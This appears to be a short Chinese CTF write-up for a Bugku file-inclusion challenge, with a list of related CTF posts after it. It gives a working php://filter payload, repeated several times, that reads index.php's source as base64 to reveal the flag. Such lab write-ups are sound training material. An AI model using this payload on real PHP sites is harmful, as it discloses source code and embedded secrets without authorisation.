bugku--文件包含

点击

访问一下index.php

页面报错

既然是文件包含就可以想到php伪协议

这里我们需要访问本地文件系统 构造我们的payload

?file=php://filter/read=convert.base64-encode/resource=index.php

base64解码

得到我们的flag 提交就好啦

?file=php://filter/read=convert.base64-encode/resource=index.php

?file=php://filter/read=convert.base64-encode/resource=index.php

file 访问本地系统,以php的形式,过滤读取 以base64的形式输出出来index.php里面的内容

相关推荐
kali-Myon1 天前
NewStarCTF2025-Week1-Misc
安全·ctf·misc
kali-Myon3 天前
NewStarCTF2025-Week2-Pwn
算法·安全·gdb·pwn·ctf·栈溢出
kali-Myon3 天前
NewStarCTF2025-Week2-Web
web安全·sqlite·php·web·ctf·文件上传·文件包含
亿.63 天前
羊城杯 2025
web·ctf·writeup·wp·羊城杯
unable code5 天前
攻防世界-Web-unseping
网络安全·web·ctf
unable code6 天前
攻防世界-Web-shrine
网络安全·web·ctf
风语者日志8 天前
CTF攻防世界WEB精选基础入门:command_execution
web安全·网络安全·ctf·小白入门
爱隐身的官人8 天前
PWN环境配置
windows·pwn·ctf
unable code11 天前
攻防世界-Web-easyupload
网络安全·web·ctf
rufeii21 天前
HCTF2018
ctf